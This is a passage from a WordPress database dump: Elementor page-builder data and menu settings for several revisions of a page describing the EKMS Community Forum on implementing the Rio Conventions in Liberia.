disable_topbar_sticky','default'),(16646,2503,'osh_disable_header_sticky','default'),(16647,2503,'osh_sticky_header_style','default'),(16648,2503,'_elementor_edit_mode','builder'),(16649,2503,'_elementor_template_type','wp-page'),(16650,2503,'_elementor_version','2.7.5'),(16713,2503,'_wp_page_template','default'),(16714,2503,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.<\\/p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.<\\/p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <span style=\\\"color: #339966;\\\"><strong>Please note that any inappropriate contents including topics\\/questions\\/comments\\/images\\/videos posted on the community forum, will be removed by the forum moderators.<\\/strong><\\/span><\\/p><p>If you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Join Us<\\/span>!<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16715,2507,'_elementor_edit_mode','builder'),(16716,2507,'_elementor_template_type','wp-page'),(16717,2507,'_elementor_version','2.7.5'),(16718,2507,'_wp_page_template','default'),(16719,2507,'_elementor_data','[{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29530695\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The EKMS Community Forum<\\/p>\\n<!-- \\/wp:paragraph -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(16724,2509,'_menu_item_type','post_type'),(16725,2509,'_menu_item_menu_item_parent','129'),(16726,2509,'_menu_item_object_id','2503'),(16727,2509,'_menu_item_object','page'),(16728,2509,'_menu_item_target',''),(16729,2509,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16730,2509,'_menu_item_xfn',''),(16731,2509,'_menu_item_url',''),(16733,2509,'_menu_item_template',''),(16734,2509,'_menu_item_mega_template','0'),(16735,2509,'_menu_item_nolink',''),(16736,2509,'_menu_item_category_post',''),(16737,2509,'_menu_item_megamenu',''),(16738,2509,'_menu_item_megamenu_auto_width',''),(16739,2509,'_menu_item_megamenu_col',''),(16740,2509,'_menu_item_megamenu_heading',''),(16741,2509,'_menu_item_megamenu_widgetarea','0'),(16742,2509,'_menu_item_icon',''),(16743,2509,'_elementor_controls_usage','a:0:{}'),(16744,2510,'_elementor_edit_mode','builder'),(16745,2510,'_elementor_template_type','wp-page'),(16746,2510,'_elementor_version','2.7.5'),(16747,2510,'_wp_page_template','default'),(16748,2510,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29530695\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The EKMS Community Forum<\\/p>\\n<!-- \\/wp:paragraph -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(16750,2511,'_elementor_edit_mode','builder'),(16751,2511,'_elementor_template_type','wp-page'),(16752,2511,'_elementor_version','2.7.5'),(16753,2511,'_wp_page_template','default'),(16754,2511,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Similar to other Social media site such as Facebook and Twitter, the EKMS Coummunity Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions.<\\/p>\\n<p>\\nGenerally, topics opened for discussions are about Biodiversity, Climate Change and ways to combat desertification.<\\/p>\\n<p>\\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.\\n<\\/p>\\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia, related topics, and documents, etc. Discussion is by all means restricted to registered users only.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(16756,2512,'_elementor_edit_mode','builder'),(16757,2512,'_elementor_template_type','wp-page'),(16758,2512,'_elementor_version','2.7.5'),(16759,2512,'_wp_page_template','default'),(16760,2512,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Similar to other Social media site such as Facebook and Twitter, the EKMS Coummunity Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions.<\\/p>\\n<p>\\nGenerally, topics opened for discussions are about Biodiversity, Climate Change and ways to combat desertification.<\\/p>\\n<p>\\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.\\n<\\/p>\\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia, related topics, and documents, etc. Discussion is by all means restricted to registered users only.<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(16768,2514,'_elementor_edit_mode','builder'),(16769,2514,'_elementor_template_type','wp-page'),(16770,2514,'_elementor_version','2.7.5'),(16771,2514,'_wp_page_template','default'),(16772,2514,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p>\\n<p>\\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\">Click here<\\/a>.<\\/p>\\n<p>\\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.\\n<\\/p>\\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia.  Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\">Sign In<\\/a> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\">Join Us!<\\/a><\\/p>\\n<p>\\n<strong>Added Tools to the Community:<\\/strong>\\n<\\/p>\\n<p>Members Chat (Activated)<p>\\n<p>Group online meetings hosting or Video Conferencing (In Progress)<p>\\n<p>Event Setup (In Progress)<p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(16774,2515,'_elementor_edit_mode','builder'),(16775,2515,'_elementor_template_type','wp-page'),(16776,2515,'_elementor_version','2.7.5'),(16777,2515,'_wp_page_template','default'),(16778,2515,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p>\\n<p>\\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\">Click here<\\/a>.<\\/p>\\n<p>\\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.\\n<\\/p>\\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia.  Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\">Sign In<\\/a> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\">Join Us!<\\/a><\\/p>\\n<p>\\n<strong>Added Tools to the Community:<\\/strong>\\n<\\/p>\\n<p>Members Chat (Activated)<\\/p>\\n<p>Group Chatting (In Progress)<\\/p>\\n<p>Group online meetings hosting or Video Conferencing (In Progress)<\\/p>\\n<p>Events Setup (In Progress)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(16780,2516,'_elementor_edit_mode','builder'),(16781,2516,'_elementor_template_type','wp-page'),(16782,2516,'_elementor_version','2.7.5'),(16783,2516,'_wp_page_template','default'),(16784,2516,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p>\\n<p>\\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\">Click here<\\/a>.<\\/p>\\n<p>\\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.\\n<\\/p>\\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia.  Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\">Sign In<\\/a> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\">Join Us!<\\/a><\\/p>\\n<p>\\n<strong>Added Tools to the Community:<\\/strong>\\n<\\/p>\\n<p>Members Chat (Activated)<\\/p>\\n<p>Group Chatting (In Progress)<\\/p>\\n<p>Group online meetings hosting or Video Conferencing (In Progress)<\\/p>\\n<p>Events Setup (In 